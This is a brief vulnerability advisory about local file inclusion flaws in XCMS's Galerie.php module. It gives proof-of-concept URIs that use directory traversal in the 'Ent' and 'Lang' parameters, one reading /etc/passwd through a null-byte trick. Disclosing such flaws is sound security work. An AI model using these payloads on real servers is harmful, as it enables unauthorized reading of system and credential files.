XCMS Multiple Local File Include Vulnerabilities

XCMS Multiple Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path to XCMS]/Module/Galerie.php?Ent=../../../../../../etc/
http://www.example.com/[path to XCMS]/Module/Galerie.php?Lang=../../../../../../etc/passwd%00